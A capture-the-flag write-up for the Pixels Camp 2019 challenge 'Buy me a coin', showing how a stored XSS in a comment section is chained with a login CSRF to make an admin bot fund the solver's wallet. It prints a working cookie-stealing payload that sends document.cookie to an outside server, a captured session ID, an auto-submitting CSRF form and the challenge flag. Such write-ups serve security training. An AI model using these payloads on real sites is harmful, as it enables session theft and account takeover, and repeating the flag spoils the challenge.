Buy me a coin -- Pixels Camp CTF Qualifiers 2019

Buy me a coin

by mvs

Points: Level 3/5

Solves: ???

Description:

Buy me a coin

Your goal is to buy the coin that is being sold on the website, despite the fact that you’re broke. You know someone will eventually top up their wallet.

Get the coin to get your answer

Solution

TLDR

You have to make the admin top up your account with money.

1. You first exploit the comment section with XSS to get the admin execute your code
2. Notice the login system is vulnerable to CSRF
3. Use the XSS to force the admin to log in one of your accounts by using CSRF, and wait for him/her to top up your account

Description

We start by creating an account to do some testing on the service. Once we are logged in, we see that we can buy the token right away, the problem is, we ain’t got no money.

After some more testing, we realized that the deposit feature does not work. This leaves us with three thesis:

• We find a way to get some money in our account and buy a token
• We buy a token with no money
• We steal an account with some money to buy the token

The only thing left to test is the comment section. This one is weird because we can submit one comment, but once we refresh the page, the comment vanishes. Nevertheless, we have to check if someone is reading our comments, so we have to inject some javascript to perform an XSS attack and wait for an answer from the other side. We start by inject this payload:

<img src=# onerror=document.location="http://myserver/" + document.cookie>

And we got an answer!!!

34.76.56.235 - - [03/Mar/2019:19:51:02 +0000] "GET /PHPSESSID=oujsc3iqj01megj0k80httl935 HTTP/1.1" 404 152 "http://c3-f342e5d04f11-ctf.pixels.camp/wallet.php" "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0.1337"

We now have the session id oujsc3iqj01megj0k80httl935 that maybe will contain some money, or maybe the flag!! Once we inject this new session id, we see that this belongs to the account noob, and unfortunately this account does not have any token or any money. We also realized that this account is reading all the comments submitted by other accounts.

The challenge description has an interesting sentence: You know someone will eventually top up their wallet. This made us believe that there is some mechanism that is topping up accounts automatically. All we need to do is to make this mechanism top up one of our accounts.

It turns out the login is vulnerable to a CSRF attack. Maybe we could use our XSS to force someone to log in one of our accounts and hopefully deposit some money on it. Let’s create the exploit x)

This piece of html is going to log one of our users automatically when you access it. We just need to put this in a remote server and call our XSS payload again.

<html>
  <body>
    <form action="https://c3-f342e5d04f11-ctf.pixels.camp/wallet.php" method="POST">
      <input type="hidden" name="username" value="adminn"/>
      <input type="hidden" name="password" value="adminnppp"/>
      <input type="submit"/>
    </form>
  </body>
</html>
<script>document.forms[0].submit();</script>

We send a new comment, pointing to our CSRF exploit, and pray the someone will eventually top up a wallet, that in this case is going to be ours.

<img src=# onerror=document.location="http://myserver/csrf.html">

And Boom, our account has enough money to buy the token!!! After buying, we got the flag!

Flag: flag{you-owned-our-wallet-sneaky-you}